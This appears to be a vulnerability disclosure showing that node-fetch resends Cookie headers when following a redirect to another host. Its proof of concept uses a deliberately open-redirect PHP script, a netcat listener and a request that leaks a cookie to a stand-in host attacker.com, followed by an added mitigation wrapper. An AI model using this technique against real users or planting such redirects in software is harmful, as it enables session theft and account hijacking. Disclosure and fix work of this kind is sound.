Cookie header leaked to third-party site, allowing hijack of the victim's account
When a remote URL is fetched with a Cookie header and the response carries a Location header, the redirect target is fetched with the same cookie. The cookie is therefore leaked to a third party.
Example: you fetch example.com with a cookie and the response redirects to attacker.com. The redirect URL is then fetched with the provided cookie, so the cookie for example.com is leaked to attacker.com.
Cookies are the standard way to authenticate to a web application and must not leak to other sites. All browsers follow the same-origin policy, so when a redirect happens the browser does not send the cookies of example.com to attacker.com.
If you fetch http://mysite.com/redirect.php?url=http://attacker.com:8182/ it redirects to http://attacker.com:8182/ .
First set up a web server hosting redirect.php and a netcat listener:
//redirect.php (deliberately open redirect, used only to trigger the Location response in this PoC)
<?php
$url = $_GET["url"];
header("Location: $url");
/* Make sure that the code below does not get executed when we redirect. */
exit;
?>
nc -lnvp 8182
Then run the code below (Node.js ES module with node-fetch installed):
import fetch from 'node-fetch';

const body = {a: 1};
// The request goes to mysite.com; the Cookie header is intended for mysite.com only.
const response = await fetch('http://mysite.com/redirect.php?url=http://attacker.com:8182/dd', {
  method: 'post',
  body: JSON.stringify(body),
  headers: {'Cookie': 'asd=ad'}
});
// The response body is irrelevant for the PoC; what matters is the request that reaches the listener.
const data = await response.json();
console.log(data);
Request received by the attacker's netcat listener:
GET /dd HTTP/1.1
Cookie: asd=ad
Content-Type: text/plain;charset=UTF-8
Accept: */*
User-Agent: node-fetch/1.0 (+https://github.com/bitinn/node-fetch)
Accept-Encoding: gzip,deflate
Connection: close
Host: localhost:8182
As this request shows, the cookie is leaked to the third-party site attacker.com: the cookie was provided for mysite.com, but because of the redirect it is sent to attacker.com.
If the domain of the requested URL and the domain of the redirect URL are the same, the Cookie/Authorization headers may be sent to the redirected URL. If the domains differ, the redirect target is a third-party site and the Cookie/Authorization headers must not be sent.
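The following is an added example (not code from the report or from node-fetch) showing the mitigation described above: a redirect-following wrapper that drops Cookie and Authorization style headers whenever a redirect hop leaves the original hostname, while other headers continue to travel. The function names safeRedirectFetch, headersForRedirect and makeFakeFetch are assumptions made for this example; the network is replaced by a constructed fake fetch so the logic can be exercised offline, and in real use the global fetch or node-fetch would be injected in its place.

```javascript
// Added example, not part of the original report. Names below are assumptions.

// Headers that carry credentials and must not cross to another host.
const CREDENTIAL_HEADERS = ['cookie', 'cookie2', 'authorization', 'proxy-authorization'];

// Decide which request headers may travel to `redirectUrl` when the request
// started at `originalUrl`. Returns a new plain object; the input is not modified.
function headersForRedirect(originalUrl, redirectUrl, headers) {
  const from = new URL(originalUrl);
  const to = new URL(redirectUrl, originalUrl); // a Location header may be relative
  const sameHost = from.hostname === to.hostname;
  const out = {};
  for (const [name, value] of Object.entries(headers)) {
    if (!sameHost && CREDENTIAL_HEADERS.includes(name.toLowerCase())) continue;
    out[name] = value;
  }
  return out;
}

// Follow up to `maxRedirects` redirects manually, filtering headers at every hop.
// `fetchImpl` is injected so the logic can be tested offline; pass global fetch
// or node-fetch in production. Redirects are requested as 'manual' so that the
// underlying client never follows them on its own.
async function safeRedirectFetch(fetchImpl, url, init = {}, maxRedirects = 5) {
  let currentUrl = url;
  let headers = { ...(init.headers || {}) };
  let method = (init.method || 'GET').toUpperCase();
  let body = init.body;
  for (let hop = 0; hop <= maxRedirects; hop++) {
    const res = await fetchImpl(currentUrl, { ...init, method, body, headers, redirect: 'manual' });
    const location = res.headers.get('location');
    if (![301, 302, 303, 307, 308].includes(res.status) || !location) return res;
    const nextUrl = new URL(location, currentUrl).toString();
    headers = headersForRedirect(currentUrl, nextUrl, headers);
    // Mirror common client behaviour: 303, and 301/302 after POST, become GET without a body.
    if (res.status === 303 || ((res.status === 301 || res.status === 302) && method === 'POST')) {
      method = 'GET';
      body = undefined;
    }
    currentUrl = nextUrl;
  }
  throw new Error('too many redirects');
}

// Constructed stand-in for the network: mysite.com/redirect.php redirects to the
// URL given in its `url` parameter, everything else answers 200. Every request
// made is appended to `log` so the headers actually sent can be inspected.
function makeFakeFetch(log) {
  const respond = (status, hdrs) => ({
    status,
    headers: { get: (name) => hdrs[name.toLowerCase()] },
  });
  return async (url, init) => {
    log.push({ url, headers: { ...init.headers } });
    const u = new URL(url);
    if (u.hostname === 'mysite.com' && u.pathname === '/redirect.php') {
      return respond(302, { location: u.searchParams.get('url') });
    }
    return respond(200, {});
  };
}

// Replay the report's scenario against the fake network and return the request log.
async function demo() {
  const log = [];
  await safeRedirectFetch(
    makeFakeFetch(log),
    'http://mysite.com/redirect.php?url=http://attacker.com:8182/dd',
    { method: 'POST', body: '{"a":1}', headers: { Cookie: 'asd=ad', 'Content-Type': 'application/json' } },
  );
  return log;
}

demo().then((log) => {
  for (const entry of log) console.log(entry.url, entry.headers);
});
```

Running the block prints two requests: the first, to mysite.com, still carries Cookie: asd=ad, while the second, to attacker.com:8182, carries only Content-Type. The hostname comparison follows the report's wording ("same domain"); comparing the full origin (scheme, host and port) is a stricter choice that would also drop credentials on a redirect to a different port of the same host.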